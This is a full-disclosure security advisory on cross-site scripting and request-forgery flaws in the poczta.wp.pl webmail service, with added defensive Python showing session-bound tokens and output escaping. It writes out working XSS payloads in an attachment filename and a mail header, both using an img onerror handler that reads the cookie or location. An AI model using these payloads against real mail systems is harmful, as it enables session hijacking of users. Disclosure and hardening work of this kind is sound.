Poczta.WP Multiple vulnerabilities full disclosure security paper
Author: Jakub Zoczek [zoczus(x)gmail.com]
0x01 Intro
----------
Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service (poczta.wp.pl) is affected by multiple cross-site
scripting vulnerabilities and also one, almost fixed, cross-site
request forgery bug. After a long time of waiting - I got a
non-professional answer from the Customer Service Manager of WP, so I
decided to post all my research here. Thus...
0x02 XSS in mail attachments.
----------
Reported: 10/10/2012
State: Fixed
Proof Of Concept:
For example - a JPEG picture with the filename:
sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg
..sent as an e-mail attachment.
Result:
http://q-x.ath.cx/~zoczus/poc/wp/wpxss1.png
0x03 XSRF in AntyHack and AntySpam filter (adding to white list)
----------
Reported: 24/11/2012
State: "Fixed"
Proof Of Concept:
http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt
Result:
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp1.jpg
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-wp2.jpg
0x04 XSRF in AntyHack and AntySpam filter - bypassing 'fix' ;)
----------
Reported: 04/12/2012
State: Not fixed
Proof Of Concept:
Additional info for 0x03 - as I supposed, WP used a token in the white
list form (an md5 of something, regenerated every once in a while). The
problem is that the token value is probably the same for each user.
For different mail accounts, different browsers, different IP
addresses - the token is the same... Bypassing this protection seems to
be quite simple.
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass1.png
http://q-x.ath.cx/~zoczus/poc/wp/xsrf-bypass2.png
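The weakness described in 0x03 and 0x04 is a token that is not bound to the user: if the same value is handed to every account, browser and IP address, it protects nothing, because any page can embed it in a forged form. The Python below is an added illustration and not WP's code or anything from the advisory: it models the shared time-based md5 token next to a per-session HMAC token, and includes an audit helper that flags exactly the condition the advisory observed (identical tokens across distinct sessions). The form name is a placeholder, since the page does not name the real whitelist form.

```python
import hashlib
import hmac
import secrets
from typing import Sequence

# Hypothetical form identifier; the advisory does not name the real whitelist form.
WHITELIST_FORM = "antyspam-whitelist-add"


def weak_global_token(epoch_minute: int) -> str:
    """Models the flawed design the advisory describes: an md5 derived only
    from a time value. Every account, browser and IP receives the same
    string, so it carries no information about who is submitting the form."""
    return hashlib.md5(str(epoch_minute).encode()).hexdigest()


def new_session_secret() -> bytes:
    """Per-login secret kept server-side (e.g. in the session store)."""
    return secrets.token_bytes(32)


def issue_csrf_token(session_secret: bytes, form_name: str) -> str:
    """Token bound to this session and this form: HMAC-SHA256 of the form
    name under the session secret. A token captured from one account is
    worthless for another, which is what defeats the 0x04 bypass."""
    return hmac.new(session_secret, form_name.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_secret: bytes, form_name: str, submitted: object) -> bool:
    """Server-side check on the POST: recompute and compare in constant time."""
    if not isinstance(submitted, str):
        return False
    expected = issue_csrf_token(session_secret, form_name)
    return hmac.compare_digest(expected, submitted)


def tokens_are_session_bound(tokens: Sequence[str]) -> bool:
    """Audit helper: tokens collected from distinct sessions must all differ.
    The advisory's observation (same token for different accounts, browsers
    and IPs) is the condition this returns False for."""
    return len(set(tokens)) == len(tokens)


if __name__ == "__main__":
    alice, bob = new_session_secret(), new_session_secret()
    t_alice = issue_csrf_token(alice, WHITELIST_FORM)
    t_bob = issue_csrf_token(bob, WHITELIST_FORM)
    print("per-session tokens differ:", tokens_are_session_bound([t_alice, t_bob]))
    print("alice's token rejected for bob:", not verify_csrf_token(bob, WHITELIST_FORM, t_alice))
    same_minute = 22_000_000
    print("global md5 token identical for two users:",
          not tokens_are_session_bound([weak_global_token(same_minute)] * 2))
```

The audit helper is the quick way to check a deployed form: collect the hidden token from two unrelated logins and, if the values match, the token is a global value rather than a CSRF defence.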
0x05 XSS in mail headers
----------
Reported: 04/12/2012
State: Not fixed
Proof Of Concept:
Return-Path: <[email protected]>
Delivered-To: [email protected] (zoczus)
Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012
16:04:58 +0100
Received: from emkei.cz ([46.167.245.118])
(envelope-sender <[email protected]>)
by mx.wp.pl (WP-SMTPD) with SMTP
for <[email protected]>; 30 Nov 2012 16:04:58 +0100
Received: by emkei.cz (Postfix, from userid 33)
id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: [email protected]
Subject:
From: "[email protected]" <[email protected]>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: [email protected]
Reply-To: [email protected]
Content-Type: text/plain; charset=utf-8
Message-Id: <[email protected]>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph]
Dobre!
Result:
http://q-x.ath.cx/~zoczus/poc/wp/wp-xss2.png
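Sections 0x02 and 0x05 share one root cause: an attacker-controlled string (an attachment filename, a header name) is copied into the webmail HTML without escaping. As an added example that is not part of the advisory or WP's code, the Python below puts a renderer that concatenates raw strings beside a hardened one, escapes header names and values in a "show headers" view, and uses a small HTML parser check to confirm that only the elements the renderer itself emits survive. The sample filename and header line are constructed to mirror the page's payloads; the /download URL, the table layout and the conservative header-name allow-list are assumptions.

```python
import html
import re
from html.parser import HTMLParser
from typing import Iterable, List, Tuple
from urllib.parse import quote

# Constructed sample inputs modelled on the advisory's two payloads
# (an attachment filename and a raw header line carrying markup).
SAMPLE_FILENAME = 'sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg'
SAMPLE_HEADER_LINE = 'Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces'

# RFC 5322 field names may contain any printable ASCII except ':' and space,
# so '<', '"' and '/' are syntactically legal (which is why the advisory's
# header name avoids spaces). Escaping is the real defence; this stricter
# allow-list (an assumption, not an RFC rule) only marks unusual names for the UI.
_CONVENTIONAL_NAME = re.compile(r"[A-Za-z0-9-]+")


def render_attachment_link_unsafe(filename: str) -> str:
    """The pattern the 0x02 result implies: the filename is concatenated
    straight into markup, so quotes and tags inside it become live HTML."""
    return f'<a href="/download?name={filename}" title="{filename}">{filename}</a>'


def render_attachment_link(filename: str) -> str:
    """Hardened form: percent-encode for the URL component, HTML-escape
    (including quotes) for the attribute value and the text node."""
    safe_text = html.escape(filename, quote=True)
    return f'<a href="/download?name={quote(filename, safe="")}" title="{safe_text}">{safe_text}</a>'


def is_conventional_header_name(name: str) -> bool:
    """Flags names outside the letters/digits/hyphen set used by registered headers."""
    return _CONVENTIONAL_NAME.fullmatch(name) is not None


def parse_header_line(line: str) -> Tuple[str, str]:
    """Split one unfolded header line at the first ':' into name and value."""
    name, _, value = line.partition(":")
    return name.strip(), value.strip()


def render_headers(raw_lines: Iterable[str]) -> str:
    """Render a 'show headers' view: every name and value is escaped, and
    unconventional names are labelled so the UI can display them as suspicious."""
    rows: List[str] = []
    for line in raw_lines:
        name, value = parse_header_line(line)
        label = html.escape(name, quote=True)
        if not is_conventional_header_name(name):
            label += " [unusual name]"
        rows.append(f"<tr><th>{label}</th><td>{html.escape(value, quote=True)}</td></tr>")
    return "<table>" + "".join(rows) + "</table>"


class _TagCollector(HTMLParser):
    """Records every start tag a browser-like parser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def tags_in(fragment: str) -> List[str]:
    """Check helper: only the elements the renderer itself emits should appear."""
    collector = _TagCollector()
    collector.feed(fragment)
    return collector.tags


if __name__ == "__main__":
    print("unsafe link elements:", tags_in(render_attachment_link_unsafe(SAMPLE_FILENAME)))
    print("safe link elements:  ", tags_in(render_attachment_link(SAMPLE_FILENAME)))
    print("header view elements:", tags_in(render_headers([SAMPLE_HEADER_LINE, "X-Priority: 3 (Normal)"])))
```

The parser check is the useful regression test for a webmail front end: feed it the rendered fragment and assert that the tag list equals what the template emits, so a filename or header that smuggles an extra element fails the build instead of reaching a browser.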
0x06 The end. :)
----
Best regards,
Jakub Zoczek